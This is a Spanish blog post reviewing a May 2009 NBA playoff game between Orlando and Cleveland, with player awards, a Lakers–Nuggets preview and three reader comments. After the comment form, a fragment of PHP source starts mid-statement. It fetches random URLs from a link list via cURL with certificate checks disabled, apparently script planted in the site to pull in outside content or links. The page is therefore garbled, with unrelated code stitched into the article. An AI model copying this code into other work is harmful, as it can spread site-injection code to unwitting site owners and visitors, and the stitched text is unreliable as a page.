Playoffs (24/05/2009): El descenso a los infiernos

25 de May de 2009 por TheDeerHunter

mobloodNo se puede decir que sea una sorpresa. Además de grandiosos partidos y de lanzamientos sobrenaturales por parte de leyendas, la historia de los Playoffs también se escribe con encuentros broncos rebosantes de tensión, de la defensa entendida como pseudo-violencia, de “hack-a-Shaqs”, de Nash saltando por los aires o de LeBron en plan quarterback. Pero no sólo hablamos de los “Bruce Lee”, Rasheed Wallace, Rodman o el mismísimo Lambeer… Recordamos a los míticos Celtics de Larry Bird en el 84 sacar a golpes de la final a aquellos Lakers. Forma parte de la mitología de la competición y de su idiosincrasia, que ahora se transforma en algo similar a un “pressing-basket”.

LeBron se recuperó anoche del sueño de su canasta ganadora a base de faltas duras y juego interrumpido. Si teníamos dudas de cómo se iba a recuperar Orlando del nuevo “The Shot”, pudimos despejarlas en cuanto vimos a Anthony Johnson cascarle un codazo en los morros a Mo Williams en una entranda a canasta. Ni siquiera tenía la excusa de estar defendiéndole. Esta fue la línea que se marcó en el partido. 58 faltas, 2 técnicas y una flagrante, con 86 tiros libres y 4 jugadores expulsados. Una batalla en toda regla que difícilmente tiene que ver con el juego en sí.

lebjamesmissEl disfraz de lo físico les sentó mejor a Orlando que a Cleveland o a Denver el otro día. Los Cavs sufrieron sus peores porcentajes de tiro de toda la temporada y LeBron, aun anotando muchísimos puntos (gran cantidad de ellos desde la línea) apenas acertó algún tiro más allá de los dos metros del aro. Y no es que se arrugaran ante la lluvia de golpes. Los Cavs también dieron lo suyo, concretamente 10 faltas más que Orlando. Sin acierto exterior, tampoco lograron imponer su juego rápido, y apenas pudieron acertar en un par de contraataques. No funcionó nada y esta vez no le pusieron en grandes dificultades a sus rivales. Mala cara está cogiendo la eliminatoria para ellos, cuando de momento únicamente han podido puntuar gracias a un milagro.

En Orlando, hasta 5 jugadores lanzaron tanto o más a canasta que Dwight Howard, aunque esta vez fue justificado, pues sólo pisó la pista durante 28 minutos por problemas de faltas. Con todo, le dio tiempo a ser el mejor de un muy buen equipo, con importante aportación de Alston, Courtney Lee y Pietrus añadidos a un correcto partido de Lewis y Turkoglu (aunque no en el tiro). En conjunto, un partido muy serio y a cara de perro de los Magic, pero es cierto que de momento son los que mejor imagen colectiva están dando de todos los semifinalistas. Harían bien en rematar a Cleveland ahora que los tienen maduros.

dwunkPREMIOS

MVP: Hemos visto a Dwight Howard completar estadístidas mucho más espectaculares que sus 24 puntos y 9 rebotes de anoche, pero difícilmente se pueden sacar más réditos a apenas 28 minutos de juego. Superman estuvo especialmente acertado en su kriptonita particular, los tiros libres: anotó 14 de 19, con un 8 de 10 en los últimos 5:30 de juego.

La sorpresa: A estas alturas queda poco margen para las aportaciones fuera de guión. Lo más parecido que vimos anoche fueron los 18 puntos, 4 rebotes, 3 asistencias y 3 robos de Rafer Alston, fundamental para amortiguar la pésima noche en el tiro por parte de Turkoglu.

La decepción: De nuevo el banquillo de los Cavs falló estrepitosamente. Los 8 puntos logrados entre Smith y Wallace no disimulan una actuación desastrosa encabezada por Pavlovic, tan importante en la victoria del pasado viernes pero nulo anoche.

kobethreeclutchEl mayor esfuerzo en vano: La actuación de LeBron James le sirvió para obtener un nuevo récord, el de único jugador en activo con 14 partidos consecutivos de Playoffs de más de 25 puntos, pero no para ganar. La escasa aportación de sus compañeros y sus propios malos porcentajes, especialmente en los tiros libres del último cuarto, fueron demasiada losa pese a sus 41 puntos, 9 asistencias y 7 rebotes.

RAZONES PARA TRASNOCHAR

Lakers @ Nuggets. Con la sensación de que la serie podría estar en una situación muy diferente, los Nuggets afrontan un partido vital. Otra victoria de los Lakers pondría la eliminatoria 3-1 con dos partidos todavía por jugarse en L.A., por lo que el Pepsi Center será una olla a presión esta noche a partir de las 3.00 (hora peninsular española). Probablemente veamos a los locales llevar el partido más hacia el terreno de lo físico, mientras que los Lakers se agarrarán una vez más a la calidad de Kobe, Pau y Trevor ‘El Tercer Hombre’ Ariza a la espera de que Odom, Bynum, Fisher y compañía den señales de vida.

Comenta

3 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Vaya, si no hubiera sido por la estratosferica canasta de LeBron, ahora iría la eliminatoria 3-0 para los de Florida…

    Estando ‘The King’ por medio es pronto para hablar pero los Cavs no han demostrado todavía nada contra equipos de nivel, su regularidad contra los más debiles, eso sí, les ha llevado a las finales del este con gran autoridad.

    Aunque reconozco que no soy el más apropiado para hablar mal de los Cavs, a mi este equipo me suscita muchas dudas, sigo pensando que sin LeBron no serían ni equipo de playoffs.

      Citar

  2. aro_pasado_no_newtoniano dice:
    #2

    Para promiscuidad la de The deerhunter…joer,, vaya fenomeno.

      Citar

  3. TheDeerHunter dice:
    #3

    cest moi???

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>